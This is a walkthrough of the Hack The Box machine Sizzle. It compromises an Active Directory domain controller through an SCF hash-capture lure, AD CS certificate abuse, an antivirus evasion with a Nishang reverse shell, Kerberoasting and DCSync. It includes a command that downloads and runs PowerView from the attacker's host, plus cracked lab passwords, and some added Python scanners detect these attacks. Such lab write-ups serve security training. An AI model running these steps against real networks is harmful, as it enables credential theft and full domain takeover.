Sizzle HTB

IP

10.10.10.103

Let's start with our initial nmap scan

nmap -p- --min-rate 10000 10.10.10.103 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','

We can see that the following ports are open

21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49667,49668,49676,49689,49690,49693,49696,49712,49716

Let's run a more in-depth scan of the target

sudo nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49667,49668,49676,49689,49690,49693,49696,49712,49716 10.10.10.103 -oA Nmap_scan

Results

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| tls-alpn: 
|   h2
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-title: Site doesn't have a title (text/html).
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-12-14T00:52:29
|_  start_date: 2023-12-14T00:48:26
|_clock-skew: mean: -33s, deviation: 0s, median: -33s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.99 seconds

From the results we can see:

  • the domain name HTB.LOCAL; let's add this to our hosts file

  • the hostname SIZZLE (certificate common name sizzle.htb.local); we'll add this to the hosts file as well

  • Port 21 (FTP) allows anonymous authentication

  • Port 80 (HTTP) is running Microsoft IIS httpd 10.0, indicating this is very likely a Windows machine

Initial Enumeration via Anonymous Access

Port 53 DNS

Let's see if we can perform a zone transfer using dig

  • No results (failed)

Port 21 FTP

Since anonymous authentication is permitted on the FTP service, let's see if we can find any useful information

  • Authentication was successful

  • No files within FTP

Port 445 SMB

Let's see if SMB allows for anonymous authentication

  • successful

Let's list the shares and see if we can find anything

  • Department Shares looks interesting; let's see what it contains

  • -M specifies a CrackMapExec module to use

  • spider_plus: crawls the SMB shares we have access to and dumps what they contain into a JSON file, which is saved as /tmp/cme_spider_plus/<target ip>.json

Let's clean up the JSON file so it is easier to view

Results

  • Don't really know what to make of these

  • Let's use smbclient to enumerate further

We can see quite a lot of directories

If we look at the Users directory we can see a list of possible users for the machine

We can save these users to a file and use some bash to clean them up

Let's mount Department Shares on our local machine to make inspecting these files easier

Let's see if we have any write access within the share

  • For this we can use the tool smbcacls. What does it do?

    • It sets or gets Access Control Lists on NT file or directory names; essentially we can use it to check for writeable files and directories within Department Shares

Once we run this script we can see we have the following write permission:

  • Users/Public is writeable

Now that we can write to a directory, there is something called SCF (Shell Command File) files. This blog is a good one to brush up on: https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/ Essentially an SCF is a Windows shortcut-style file that causes specific commands or scripts to execute when a user opens the directory the file resides in. Now how can this be useful to us?

  1. We are going to create an SCF file that will attempt an SMB connection to our local machine, from which we can capture a user's password hash; our SCF file should contain the following

  2. We are going to place this SCF file within the writeable directory Users/Public in the SMB share: cp file.scf /mnt/Users/Public

  3. When the user opens this directory it should execute the malicious SCF file and attempt an SMB connection back to our local machine, where we will be running impacket-smbserver.py to capture the user's password hash
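As an added defensive counterpart to the lure above (example code, not from the original write-up): a small Python scanner that walks a mounted share and flags SCF files whose IconFile points at a UNC path, which is exactly what makes a browsing user's host authenticate to a foreign SMB server. The SCF bodies, the directory tree and the host 10.10.14.7 are constructed samples.

```python
import os
import re
import tempfile

# Constructed sample SCF bodies (not files from the original box). The first mimics
# the lure described above: IconFile names a UNC path, so Explorer authenticates
# outbound over SMB as soon as the folder is rendered. The second is benign.
LURE_SCF = ("[Shell]\r\nCommand=2\r\n"
            "IconFile=\\\\10.10.14.7\\share\\icon.ico\r\n"
            "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
BENIGN_SCF = ("[Shell]\r\nCommand=2\r\n"
              "IconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
              "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
# \\host\... -> "host"; the trailing backslash is optional so a bare \\host matches
UNC_RE = re.compile(r"^\\\\([^\\\s]+)(?:\\|$)")

def icon_file(scf_text):
    """Return the IconFile value of an SCF body, or None if it has none."""
    for line in scf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "iconfile":
            return value.strip()
    return None

def remote_icon_host(scf_text):
    """Host named by a UNC IconFile, or None when the icon is local."""
    icon = icon_file(scf_text)
    match = UNC_RE.match(icon) if icon else None
    return match.group(1) if match else None

def scan_share(root):
    """Walk a mounted share and return [(relative path, remote host)] for every
    SCF whose icon is fetched over SMB. In a writeable, browsed folder that is
    the lure described above: remove the file and review the folder's ACL."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                host = remote_icon_host(fh.read())
            if host:
                findings.append((os.path.relpath(path, root), host))
    return findings

def demo():
    """Build a throwaway Users/Public tree holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as share:
        public = os.path.join(share, "Users", "Public")
        os.makedirs(public)
        for name, body in (("lure.scf", LURE_SCF), ("desktop.scf", BENIGN_SCF)):
            with open(os.path.join(public, name), "w", encoding="latin-1") as fh:
                fh.write(body)
        return scan_share(share)
```

Any host reported that is not one of your own file servers is worth an alert; the same scan can be scheduled against every share that grants write access to a broad group.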

We wait a few minutes and we have the password hash of the user amanda

Let's crack the password using hashcat. Quick tip: as we know this is a NetNTLMv2 hash, we need to find the correct hashcat mode, which we can grep for

Now let's crack it

We now have the password

For good measure, let's see if any of the files residing in ZZ_ARCHIVE contain any data

Let's create a bash script that uses xxd to check for files that contain anything other than null bytes

  • returns nothing
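The same triage as a reusable Python routine, added here as an example rather than the author's bash script: it streams each file, counts null bytes, and reports only the files that hold something other than padding, treating empty files as having no content. The ZZ_ARCHIVE look-alike directory and its file names are constructed.

```python
import os
import tempfile

def null_byte_profile(path, chunk_size=65536):
    """Return (size, null_count) for a file, streaming so large archives are fine."""
    size = nulls = 0
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            size += len(chunk)
            nulls += chunk.count(0)
    return size, nulls

def has_content(size, nulls):
    """A file is worth opening only if at least one byte is non-null;
    an empty file is treated as having no content as well."""
    return size > 0 and nulls < size

def triage_directory(root):
    """Map each relative path under root to (size, null_count, has_content)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            size, nulls = null_byte_profile(path)
            report[os.path.relpath(path, root)] = (size, nulls, has_content(size, nulls))
    return report

def files_with_content(report):
    """Sorted list of the paths that contain something other than null padding."""
    return sorted(path for path, (_, _, real) in report.items() if real)

def demo():
    """Constructed ZZ_ARCHIVE look-alike: two all-null decoys, one empty file,
    and one file whose real bytes are buried between null padding."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "archive01.doc": b"\x00" * 4096,
            "archive02.pptx": b"\x00" * 2048,
            "empty.bin": b"",
            "notes.txt": b"\x00" * 10 + b"hidden" + b"\x00" * 10,
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return triage_directory(root)
```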

Port 80 (HTTP)

When we navigate to http://htb.local we can see the following

What we can see is:

  • We can confirm it is running the Microsoft ASP.NET framework

  • It is a Windows server

If we look at the page source we can see the following

  • pretty dry

If we navigate to http://sizzle and http://sizzle.htb.local nothing changes on the web pages, meaning there is most likely no virtual host routing

Port 443 HTTPS

  • Nothing new

Looking at the certificate we can see the following

  • If we look at the common name we can see HTB-SIZZLE-CA, which is a certificate authority, meaning someone likely configured a certificate authority on this box, which is interesting

    • We can see when it was created and when it expires

    • 03 july 2018 - 02 july 2020

We can perform some directory busting with feroxbuster to see if we can find any hidden web pages on both HTTP and HTTPS

  • While these run we'll continue with our initial enumeration

  • Found nothing interesting

Let's check if there is any virtual host routing: when we navigate to https://sizzle and https://sizzle.htb.local there are no changes to the web page

  • No virtual host routing on either HTTP or HTTPS

Port 135 RPC

Let's see if we can access RPC anonymously

  • failed

Port 389 LDAP

Let's see if we can use an anonymous bind and perform an LDAP dump using

  • No data returned

Let's check the naming context

We can confirm this is AD from the default AD configuration

We can test if we can search for anything with an anonymous bind

  • which fails

Enumeration via amanda

Now that we have the user Amanda's credentials, we should continue the enumeration process.

Since WinRM is open, we can try to gain a shell with evil-winrm

  • No luck

SMB

Let's see if these credentials work for SMB

We can see we can authenticate to SMB, but we haven't pwned it, meaning there is still work to be done

Let's list the shares we now have access to

We can see we have read access to other shares now

More particularly the CertEnroll share; we will come back to this once we have checked out the other services

  • Using amanda's credentials (amanda: Ashare1972)

  • we can access Microsoft Active Directory Certificate Services. Now, what is it exactly, and what can we actually do with it?

What is Microsoft Active Directory Certificate Services?

  • Active Directory Certificate Services (AD CS) is essentially a role within the Windows Server OS that implements Public Key Infrastructure (PKI) services. PKI involves the use of cryptographic keys and certificates to secure communication and to authenticate users (hint hint) and devices; its main goal is to ensure the confidentiality and integrity of data

How can we exploit this?

  • Essentially we are going to generate a certificate request and use CertSRV to sign our certificate as amanda, which should authenticate us when we are PSRemoting into the machine

Steps

  1. Generate a private key using openssl

  2. Generate a new certificate signing request (CSR) using our newly created private key amanda.key

  3. Now we want to get our CSR signed by AD CS; we take our amanda.csr and copy it

We click on Request a certificate

then on advanced certificate request

Now we simply paste our CSR into the Saved Request field

  4. Next we can download our certificate

Now we have a certificate signed by the Certificate Authority for the amanda user, which should allow us to authenticate to the Domain Controller

Now we can utilise our new certificate and key to WinRM into the machine. A quick Google led me to https://notes.offsec-journey.com/enumeration/winrm which essentially shows how to authenticate to WinRM on port 5986 (HTTPS) using a certificate, so the steps are

  1. Make some modifications

We now have a shell on the box

Now we will continue with SMB just to finish our enumeration process

For good measure, let's perform a password spray and see if any other user shares the same password

  • No luck

Let's check out this CertEnroll share

We can see we have the following files

  • Let's download the contents

LDAP

Let's run BloodHound and see if we can pick up further information about the domain

  • We will use bloodhound-python

Let's open BloodHound and inspect the results

Once we have BloodHound open, it's always good practice to mark the users we have owned

amanda's

  • groups

    • USERS

    • DOMAIN USERS

    • REMOTE MANAGEMENT USERS

When we list all of the Kerberoastable accounts we can see something interesting

  • This indicates there is a Kerberoastable account on the machine, possibly for a service running internally; we'll keep this in mind

Does this MRLKY account have anything we can utilise?

  • When we look at the user's First Degree Object Control we can see the user MRLKY has the following rights to the Domain Controller

    • DCSync

    • GetChangesAll

    • GetChanges

  • Meaning if we can compromise the MRLKY account we can request data from the domain controller (NTDS.dit, which contains all the domain users' hashes)

Looking at the reachable High Value Targets we can see our user amanda has CanPSRemote to the SIZZLE.HTB.LOCAL computer. Knowing we have a Kerberoastable account MRLKY, we can possibly compromise the account and, as the user MRLKY, perform a DCSync attack and retrieve the NTDS.dit file, from here

Let's run ldapdomaindump for good measure and see if we can find anything else
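A defender's counterpart to what BloodHound showed above, added here as example code (not from the write-up, from BloodHound or from bloodhound-python): it reads a BloodHound-style domains.json, groups replication-related ACEs on the domain object by principal, and reports every DCSync-capable principal outside an allowlist of defaults. The JSON shape approximates bloodhound-python's output and the ACEs are constructed; the allowlist of default replicating principals is an assumption to tune per forest.

```python
import json
from collections import defaultdict

# Principals that hold replication rights on the domain object in a default AD
# install. Assumption used as the allowlist here; tune it to your own forest
# (Azure AD Connect service accounts are a common legitimate addition).
DEFAULT_REPLICATORS = {
    "DOMAIN CONTROLLERS@HTB.LOCAL",
    "ENTERPRISE DOMAIN CONTROLLERS@HTB.LOCAL",
    "ADMINISTRATORS@HTB.LOCAL",
}
# Rights on the domain object that, alone or combined, let a principal replicate secrets.
UMBRELLA_RIGHTS = {"DCSync", "GenericAll", "AllExtendedRights"}
REPLICATION_RIGHTS = {"GetChanges", "GetChangesAll", "GetChangesInFilteredSet"} | UMBRELLA_RIGHTS

# Constructed sample approximating the Aces entries in bloodhound-python's
# domains.json (only the fields used here; real data carries PrincipalSID too).
SAMPLE_DOMAINS_JSON = json.dumps({"data": [{"Properties": {"name": "HTB.LOCAL"}, "Aces": [
    {"PrincipalName": "DOMAIN CONTROLLERS@HTB.LOCAL", "RightName": "GetChanges"},
    {"PrincipalName": "DOMAIN CONTROLLERS@HTB.LOCAL", "RightName": "GetChangesAll"},
    {"PrincipalName": "ADMINISTRATORS@HTB.LOCAL", "RightName": "GetChanges"},
    {"PrincipalName": "ADMINISTRATORS@HTB.LOCAL", "RightName": "GetChangesAll"},
    {"PrincipalName": "ENTERPRISE READ-ONLY DOMAIN CONTROLLERS@HTB.LOCAL", "RightName": "GetChanges"},
    {"PrincipalName": "MRLKY@HTB.LOCAL", "RightName": "GetChanges"},
    {"PrincipalName": "MRLKY@HTB.LOCAL", "RightName": "GetChangesAll"},
    {"PrincipalName": "AUTHENTICATED USERS@HTB.LOCAL", "RightName": "GenericRead"},
]}]})

def replication_rights(domains_json):
    """Return {domain: {principal: set(replication-related rights)}}."""
    out = {}
    for dom in json.loads(domains_json)["data"]:
        per_principal = defaultdict(set)
        for ace in dom.get("Aces", []):
            if ace["RightName"] in REPLICATION_RIGHTS:
                per_principal[ace["PrincipalName"]].add(ace["RightName"])
        out[dom["Properties"]["name"]] = dict(per_principal)
    return out

def dcsync_capable(rights):
    """GetChanges and GetChangesAll together are what DCSync needs; GetChanges
    alone (the read-only DC default) is not enough, an umbrella right always is."""
    return {"GetChanges", "GetChangesAll"} <= rights or bool(rights & UMBRELLA_RIGHTS)

def unexpected_dcsync_principals(domains_json, allowlist=DEFAULT_REPLICATORS):
    """Per domain, the DCSync-capable principals that are not on the allowlist."""
    return {
        domain: sorted(p for p, r in principals.items()
                       if dcsync_capable(r) and p not in allowlist)
        for domain, principals in replication_rights(domains_json).items()
    }
```

Running this against a fresh collection after each change to the domain object's ACL turns the BloodHound finding above into a recurring control rather than a one-off observation.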

  • Nothing new

Priv esc via amanda

Now that we have a PSRemote session on the target server, and we know of the Kerberoastable user mrlky, we can load PowerView and perform some Kerberoasting

Let's load PowerView.ps1 onto the target

  1. Start a python3 server: python3 -m http.server 80

  2. Download the script and execute it: IEX(iwr http://10.10.14.7/PowerView.ps1 -UseBasicParsing)

What's interesting is that AV detected this; we also try to download the file without executing it and get a permission denied

We can see the line

  • Cannot create type. Only core types are supported in this language mode. Meaning we have limited functionality in PowerShell

  • ScriptContainedMaliciousContent, meaning we have AV upon us

We can check our current language mode in the session with

  • $ExecutionContext.SessionState.LanguageMode

Let's handle one thing at a time. Current objectives:

  1. We need to bypass our current language mode

  2. We need to bypass the AV and execute PowerView.ps1

Bypassing our current language mode

Plan A

Let's upload a Nishang reverse shell and see if we can establish another shell without the language constraints

  1. Once we have moved Invoke-PowerShellTcp.ps1 into our current working directory we want to modify it slightly, just to bypass any AV that may pick it up

  • Notice we have deleted the comments and changed the function name; hopefully this is a basic AV and we can execute this under the radar

  2. Let's set up an nc listener: rlwrap -cAr nc -lvnp 9001

  3. Set up a Python server for the target to download it from: python3 -m http.server 80

  4. Let's use wget and see if we can download the file onto the target

Now let's use PowerShell version 2 and run our Nishang script

If we look back at our nc listener we can see we successfully gained a reverse shell on the system with FullLanguage mode

In our new shell, let's set ourselves up for a Kerberoasting attack

Let's continue to enumerate the system as amanda and see if there is anything else that could help us

Let's see if we can find any text files under the C:\ directory

  • Looking through the output we can see something interesting

Within the C:\Windows\System32 directory we find the following

file.txt holds the hashes for the users within the system

  • Don't know if this is supposed to be here

  • But let's try and crack them anyway

Let's clean the hashes

We find the password for mrlky: Football#7

We'll keep these in mind, but there has to be another way to priv esc

Let's continue from our new shell as amanda

We can confirm mrlky is vulnerable to Kerberoasting by querying the SPNs registered in AD with

We will utilise PowerView.ps1 to perform the Kerberoasting attack

  1. First let's load the PowerView.ps1 script

  2. Now let's create a PSCredential object $Cred using amanda's credentials

  3. Now that we have a PSCredential object we can use amanda's credentials to communicate with the Kerberos service and perform the attack; we can use the

We now have mrlky's ticket; let's crack it

A couple of quick tips: since we are using vim as our text editor, we want to remove all whitespace and newlines, which we can do

once we have copied and pasted the hash with

  1. :%s/\s\+//g

  2. :%s/\n//g

Now we can crack the ticket hash

And we have the credentials mrlky: Football#7

Since we now have this new set of credentials, we can repeat the same process we did with the amanda account and create a certificate

Now we can modify our WinRM script again, but with mrlky's key and new cert

We get a shell as the user mrlky

Since we already know our current user has DCSync rights on the Domain Controller, we can simply run secretsdump.py from our local host

Worked perfectly

Now we can test the Administrator hash against SMB with crackmapexec

Now we can utilise wmiexec.py and gain a shell on the system

Now we have a shell as Administrator on the target machine
